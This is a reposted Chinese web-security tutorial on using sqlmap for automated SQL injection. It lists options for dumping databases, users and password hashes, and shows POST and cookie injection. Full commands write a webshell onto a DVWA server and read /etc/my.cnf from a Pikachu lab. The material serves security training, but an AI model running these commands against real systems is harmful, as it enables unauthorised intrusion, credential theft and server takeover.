风炫安全WEB安全学习第十八节课使用SQLMAP自动化注入(二) - 代码天地

风炫安全WEB安全学习第十八节课使用SQLMAP自动化注入(二)

其他 2021-03-08 22:42:09 阅读次数: 0

风炫安全WEB安全学习第十八节课使用SQLMAP自动化注入(二)

–is-dba 当前用户权限（是否为root权限）
–dbs 所有数据库
–current-db 网站当前数据库
–users 所有数据库用户
–current-user 当前数据库用户
–random-agent 构造随机user-agent
–passwords 数据库密码
–proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理
–time-sec=TIMESEC DBMS响应的延迟时间（默认为5秒）

post注入

使用burpsuite截取包，然后保存文件为1.txt(文件名随便取)，再使用 sqlmap -r 1.txt --dbs

cookie注入

sqlmap -u “http://www.baidu.com/shownews.asp” –cookie “id=11” –level 2（只有level达到2才会检测cookie）

读写文件

--file-read=RFILE 从后端的数据库管理系统文件系统读取文件 （物理路径）
--file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 （mssql xp_shell）
--file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

sqlmap -r "c:\request.txt" -p id –dbms mysql –file-dest "e:\php\htdocs\dvwa\inc\include\1.php" –file-write "f:\webshell\1112.php"

将本地的f:\webshell\1112.php 写入到远程服务器上e:\php\htdocs\dvwa\inc\include\1.php

sqlmap -u "http://localhost/pikachu/vul/sqli/sqli_header/sqli_header.php" --cookie 'ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=6i60hcmeappdlkr216jovc0o6l' --level 2 --dbms mysql --file-read "/etc/my.cnf"

读取远程/etc/my.cnf文件

参考：
https://blog.evalshell.com/2020/12/20/%e9%a3%8e%e7%82%ab%e5%ae%89%e5%85%a8web%e5%ae%89%e5%85%a8%e5%ad%a6%e4%b9%a0%e7%ac%ac%e5%8d%81%e5%85%ab%e8%8a%82%e8%af%be-%e4%bd%bf%e7%94%a8sqlmap%e8%87%aa%e5%8a%a8%e5%8c%96%e6%b3%a8%e5%85%a5%e4%ba%8c/

猜你喜欢

转载自blog.csdn.net/hyj123480/article/details/111610905

风炫安全WEB安全学习第十八节课使用SQLMAP自动化注入(二)

风炫安全WEB安全学习第十七节课使用Sqlmap自动化注入(一)

风炫安全Web安全学习第十六节课高权限sql注入getshell

web安全SQLmap自动化注入

风炫安全WEB安全学习第三十八节课越权漏洞演示与讲解

风炫安全web安全学习第二十八节课 CSRF攻击原理

风炫安全WEB安全学习第九节课常见Sql注入漏洞(一)

sqlmap的学习之路-自动化测试SQL注入工具

风炫安全Web安全学习第三十九节课反序列化漏洞基础知识

风炫安全web安全学习第三十七节课 15种上传漏洞讲解(二)

风炫安全Web安全学习第十节课到十五课数字型的Sql注入和基于时间和布尔型的Sql注入

【网络安全-sql注入（5）】sqlmap以及几款自动化sql注入工具的详细使用过程（提供工具）

风炫安全Web安全学习第四十节课反序列化漏洞攻击利用演示

sqlmap自动化注入工具使用浅析

风炫安全WEB安全学习第十九节课 XSS的漏洞基础知识和原理讲解

风炫安全WEB安全学习第四十九节课靶场的搭建与实战

风炫安全WEB安全学习第四十四节课敏感信息泄漏

风炫安全Web安全学习第四十三节课路径遍历漏洞

风炫安全Web安全学习第四十二节课 SSRF漏洞演示与讲解

风炫安全web安全学习第三十四节课文件包含漏洞防御

风炫安全web安全学习第二十九节课 CSRF防御措施

风炫安全WEB安全学习第二十节课反射型XSS讲解

Web安全第4讲 - sqlmap性能优化&sqlmap注入参数&sqlmap注入技术参数

【安全测试学习】自动化注入攻击之 FuzzDB和Burp 组合拳

web安全攻防-sqlmap注入参数

风炫安全WEB安全学习第四十五节课信息收集之子域名搜集

风炫安全Web安全学习第四十一节课 XXE漏洞演示与讲解

风炫安全web安全学习第三十六节课-15种上传漏洞讲解(一)

风炫安全web安全学习第三十五节课文件下载和文件读取漏洞

风炫安全web安全学习第三十二节课 Python代码执行以及代码防御措施

今日推荐

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」

开源日报 | 谷歌扶持鸿蒙上位；开源Rabbit R1；Docker加持的安卓手机；微软的焦虑和野心；海尔电器把开放平台关了

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

周排行

Java自定义时间格式

同步整形电路

在开发中最最最常用的字符串的属性大集合

Linux 查看端口占用并杀掉

Java基础四：ArrayList

多线程之死锁就是这么简单

mysql 基础命令集

awk 命令详解

Centos6.3编译安装nginx+php步骤

OCR （Optical Character Recognition，光学字符识别）

每日归档

更多

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)